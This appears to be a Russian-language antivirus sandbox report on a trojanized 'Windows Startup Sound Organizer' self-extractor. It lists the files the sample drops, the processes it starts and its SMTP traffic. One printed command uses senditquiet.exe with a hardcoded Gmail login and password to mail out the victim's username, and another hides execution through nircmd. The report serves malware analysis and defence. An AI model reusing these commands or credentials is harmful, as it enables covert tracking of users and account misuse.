Техническая информация
- '%TEMP%\RarSFX1\sendmail.exe'
- '%TEMP%\RarSFX1\senditquiet.exe' -f djfake512@gmail.com -t djfake512@gmail.com -s smtp.gmail.com -port 587 -protocol ssl -u djfake512@gmail.com -p @qwerty@512 -subject "Startup sound from %USERNAME%" -body "%USERNAME% is using Windows Startup Sound Organizer (v1.02). The computer is in zone."
- '%TEMP%\RarSFX1\nircmd.exe' exec hide "sendmail.exe"
- '%TEMP%\RarSFX0\Windows Startup Sound Organizer (by P19).exe'
- '%TEMP%\RarSFX0\sendmail.exe'
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\RarSFX1\starter.bat" "
- '<SYSTEM32>\xcopy.exe' P19.wav "%WINDIR%\Media\" /y
- '<SYSTEM32>\xcopy.exe' nircmd.exe "<SYSTEM32>\" /y
- %TEMP%\RarSFX1\starter.bat
- %TEMP%\RarSFX1\sendmail.exe
- %WINDIR%\Media\P19.wav
- %TEMP%\0RTM36L5.bat
- %TEMP%\RarSFX1\senditquiet.exe
- %TEMP%\RarSFX1\nircmd.exe
- %TEMP%\RarSFX0\P19.wav
- %TEMP%\RarSFX0\nircmd.exe
- %TEMP%\RarSFX0\Windows Startup Sound Organizer (by P19).exe
- <SYSTEM32>\nircmd.exe
- %TEMP%\8SECLTF0.bat
- %TEMP%\RarSFX0\sendmail.exe
- %TEMP%\0RTM36L5.bat
- %TEMP%\8SECLTF0.bat
- %TEMP%\RarSFX0\nircmd.exe
- %TEMP%\8SECLTF0.bat
- %TEMP%\RarSFX0\Windows Startup Sound Organizer (by P19).exe
- %TEMP%\RarSFX0\P19.wav
- %TEMP%\RarSFX0\sendmail.exe
- %TEMP%\RarSFX1\sendmail.exe
- %TEMP%\RarSFX1\senditquiet.exe
- %TEMP%\0RTM36L5.bat
- %TEMP%\RarSFX1\nircmd.exe
- 'sm##.gmail.com':587
- DNS ASK sm##.gmail.com
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'